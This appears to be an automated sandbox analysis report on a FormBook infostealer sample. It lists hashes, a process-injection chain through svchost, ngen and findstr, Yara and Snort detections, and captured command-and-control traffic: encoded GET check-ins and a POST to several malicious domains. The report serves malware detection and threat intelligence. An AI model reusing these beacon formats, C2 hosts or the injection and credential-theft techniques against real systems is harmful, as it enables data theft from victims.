Windows Analysis Report
GJRX21GBj3.exe

Overview

General Information

Sample name: GJRX21GBj3.exe (renamed because the original name is a hash value)
Original sample name: 04ca4f891cf5c2c412c58340ec0de521f940f4b36c1b0b7f1aa1fdae080922aa.exe
Analysis ID: 1467022
MD5: 804cc1b2769f38027fd2c2bf8141013b
SHA1: b75af1f4f65b7f12ba311c3c14c67642c0898fb8
SHA256: 04ca4f891cf5c2c412c58340ec0de521f940f4b36c1b0b7f1aa1fdae080922aa
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • GJRX21GBj3.exe (PID: 4080 cmdline: "C:\Users\user\Desktop\GJRX21GBj3.exe" MD5: 804CC1B2769F38027FD2C2BF8141013B)
    • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 3792 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • ngen.exe (PID: 2568 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" MD5: 417D6EA61C097F8DF6FEF2A57F9692DF)
      • pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe (PID: 7120 cmdline: "C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • findstr.exe (PID: 2072 cmdline: "C:\Windows\SysWOW64\findstr.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe (PID: 5784 cmdline: "C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5328 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps

Source | Rule | Description | Author | Strings
00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2abd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2abd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(11 entries in total; the remaining entries are not included in this extract)

Yara matches in unpacked PE files

Source | Rule | Description | Author | Strings
4.2.ngen.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.ngen.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2d2d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16912:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
4.2.ngen.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.ngen.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e0d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17712:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\GJRX21GBj3.exe", ParentImage: C:\Users\user\Desktop\GJRX21GBj3.exe, ParentProcessId: 4080, ParentProcessName: GJRX21GBj3.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 3792, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\GJRX21GBj3.exe", ParentImage: C:\Users\user\Desktop\GJRX21GBj3.exe, ParentProcessId: 4080, ParentProcessName: GJRX21GBj3.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 3792, ProcessName: svchost.exe

Timestamp: 07/03/24-16:39:32.243675
SID: 2855465
Source Port: 49711
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

            AV Detection

Source: http://www.mybodyradar.net/nml2/ | Avira URL Cloud: Label: malware
Source: GJRX21GBj3.exe | ReversingLabs: Detection: 68%
Source: Yara match | File source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: GJRX21GBj3.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: findstr.pdbGCTL source: ngen.exe, 00000004.00000002.2293830420.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924590936.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ngen.pdb source: findstr.exe, 00000007.00000002.3924355546.00000000031FE000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000003C7C000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000000.2360774678.00000000032FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2627811818.00000000286EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215505772.0000000000DFE000.00000002.00000001.01000000.00000005.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000000.2360491290.0000000000DFE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: ngen.exe, 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2296210633.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2294244319.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: findstr.pdb source: ngen.exe, 00000004.00000002.2293830420.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924590936.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: ngen.exe, ngen.exe, 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, findstr.exe, 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2296210633.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2294244319.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 7_2_02E5BF10 FindFirstFileW,FindNextFileW,FindClose, | 7_2_02E5BF10
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 4x nop then push rsi | 0_2_00007FF658600980
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 4x nop then push rbx | 0_2_00007FF658551988
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 4x nop then push rsi | 0_2_00007FF6586009D0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 4x nop then push rdi | 0_2_00007FF658600B00
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 4x nop then push rbx | 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 4x nop then push rsi | 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 4x nop then push rbx | 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 4x nop then push rbx | 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 4x nop then push rbx | 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 4x nop then push rbx | 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 4x nop then push rbx | 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 4x nop then push rbx | 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 4x nop then push rsi | 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 4x nop then push rdi | 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 4x nop then push r14 | 0_2_00007FF65865E3C0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 4x nop then push rsi | 0_2_00007FF6585D2740
Source: C:\Users\user\Desktop\GJRX21GBj3.exe | Code function: 4x nop then push rbx | 0_2_00007FF658551988
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 4x nop then xor eax, eax | 7_2_02E49830
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 4x nop then pop edi | 7_2_02E524A9
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 4x nop then pop edi | 7_2_02E52487
Source: C:\Windows\SysWOW64\findstr.exe | Code function: 4x nop then mov ebx, 00000004h | 7_2_03490548

            Networking

Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49711 -> 23.227.38.74:80
Source: DNS query: www.mg55aa.xyz
Source: Joe Sandbox View | IP Address: 43.155.26.241
Source: Joe Sandbox View | IP Address: 203.161.55.102
Source: Joe Sandbox View | IP Address: 108.179.193.98
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (12 identical entries)
Source: global traffic | HTTP traffic detected:
  GET /c7rq/?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&rz=LZsl-bkp-XfXeRLp HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.valerieomage.com
  Connection: close
  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic | HTTP traffic detected:
  GET /ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&rz=LZsl-bkp-XfXeRLp HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.kosherphonestore.com
  Connection: close
  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic | HTTP traffic detected:
  GET /kwl6/?k06T=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1S/csb+glCs2OenUaXJQynPXKXRJsgC/umNodRP7idNP7JA==&rz=LZsl-bkp-XfXeRLp HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.cwgehkk.store
  Connection: close
  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic | HTTP traffic detected:
  GET /nml2/?k06T=HPoEs5HSsEYYnAW6PVozIACR+89TlHzFxT1N2ofTBBi/nJmbqmnSjRqVxPoNn0pwlxgNo3SmadBTH7enssKrgG8HFM9ue4Cv/jlK8Hwkml5mQyRFpKLBj5uVntz3S/FMqw==&rz=LZsl-bkp-XfXeRLp HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.mybodyradar.net
  Connection: close
  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic | HTTP traffic detected:
  GET /tb8p/?k06T=qOKUC29yX8oZAlbJDfcpCLzpMPZC9WFwxrZXgt1GanD4ODtcEeVG6I3ogONv/wZG3CcBcKt2BHXhpUQRSUiI6LSlbUKGOe5tpqy+YL001eRQtx2Jgk6C84cNpUHQ9eTwUQ==&rz=LZsl-bkp-XfXeRLp HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.lacemalt.top
  Connection: close
  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic | HTTP traffic detected:
  GET /xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2/UGXXDPdESA3G681NsEYfip50N0NMaShmTLM2x7hQcZfKg==&rz=LZsl-bkp-XfXeRLp HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.siteblogoficialon.com
  Connection: close
  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic | HTTP traffic detected:
  GET /7npk/?rz=LZsl-bkp-XfXeRLp&k06T=3lhlChS8FYnXqyMl6DrMwk16pFUOD90SHj/DecBTIjGSaQxy34ZC87B+/wA+Ty9En/TQ2WIUU2NJwAlG0p0MOprHpEJhuLS8Xg3IfDdoqaVi1Ch1kdwH1TvR7mgJgyRVyQ== HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.mg55aa.xyz
  Connection: close
  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic | DNS traffic detected: DNS query: www.gospelstudygroup.org
Source: global traffic | DNS traffic detected: DNS query: www.valerieomage.com
Source: global traffic | DNS traffic detected: DNS query: www.instantmailer.cloud
Source: global traffic | DNS traffic detected: DNS query: www.kosherphonestore.com
Source: global traffic | DNS traffic detected: DNS query: www.cwgehkk.store
Source: global traffic | DNS traffic detected: DNS query: www.mybodyradar.net
Source: global traffic | DNS traffic detected: DNS query: www.lacemalt.top
Source: global traffic | DNS traffic detected: DNS query: www.siteblogoficialon.com
Source: global traffic | DNS traffic detected: DNS query: www.mcxright.com
Source: global traffic | DNS traffic detected: DNS query: www.amkmos.online
Source: global traffic | DNS traffic detected: DNS query: www.mg55aa.xyz
Source: global traffic | DNS traffic detected: DNS query: www.lavillitadepapa.com
Source: unknown | HTTP traffic detected:
  POST /ktbm/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Accept-Encoding: gzip, deflate, br
  Host: www.kosherphonestore.com
  Origin: http://www.kosherphonestore.com
  Referer: http://www.kosherphonestore.com/ktbm/
  Content-Length: 205
  Cache-Control: no-cache
  Connection: close
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
  Data Raw: 6b 30 36 54 3d 51 41 36 55 59 46 54 2b 5a 68 62 66 72 4b 62 46 6b 42 69 59 64 75 50 6f 34 2f 56 7a 48 6b 75 55 69 70 77 63 53 37 4e 4c 77 70 55 6b 45 51 41 2f 52 34 4f 6d 31 58 44 61 33 43 33 73 7a 76 44 6b 76 6c 43 6f 78 62 33 64 6c 79 7a 77 32 6f 69 6d 4d 31 71 50 50 64 32 65 48 63 2f 4f 31 66 77 74 77 61 6d 2f 67 52 71 7a 52 56 48 31 34 6d 4f 56 4f 6c 68 46 45 49 52 47 68 65 68 77 6b 38 4c 6d 4f 76 7a 70 78 38 4f 52 5a 58 41 69 35 50 4d 77 45 52 30 49 63 68 6c 71 30 50 41 6f 4e 50 76 2b 4d 34 31 46 52 5a 78 33 34 50 55 2b 57 46 78 43 7a 47 70 31 78 73 30 5a 52 59 59 50 30 4b 4e 4c 6a 36 4f 64 33 6b 59 3d
  Data Ascii: k06T=QA6UYFT+ZhbfrKbFkBiYduPo4/VzHkuUipwcS7NLwpUkEQA/R4Om1XDa3C3szvDkvlCoxb3dlyzw2oimM1qPPd2eHc/O1fwtwam/gRqzRVH14mOVOlhFEIRGhehwk8LmOvzpx8ORZXAi5PMwER0Ichlq0PAoNPv+M41FRZx34PU+WFxCzGp1xs0ZRYYP0KNLj6Od3kY=
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Wed, 03 Jul 2024 14:40:57 GMT
  Server: Apache
  Content-Length: 389
  Connection: close
  Content-Type: text/html
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Wed, 03 Jul 2024 14:41:00 GMT
  Server: Apache
  Content-Length: 389
  Connection: close
  Content-Type: text/html
  Data Raw / Data Ascii: identical to the 14:40:57 response above
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Wed, 03 Jul 2024 14:41:02 GMT
  Server: Apache
  Content-Length: 389
  Connection: close
  Content-Type: text/html
  Data Raw / Data Ascii: identical to the 14:40:57 response above
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Wed, 03 Jul 2024 14:41:05 GMT
  Server: Apache
  Content-Length: 389
  Connection: close
  Content-Type: text/html; charset=utf-8
  Data Raw / Data Ascii: identical to the 14:40:57 response above
Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925169217.0000000002CE1000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.lavillitadepapa.com
Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925169217.0000000002CE1000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.lavillitadepapa.com/i1fz/
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: GJRX21GBj3.exe | String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: GJRX21GBj3.exe | String found in binary or memory: https://aka.ms/nativeaot-c
Source: GJRX21GBj3.exe, 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: GJRX21GBj3.exe | String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: GJRX21GBj3.exe | String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
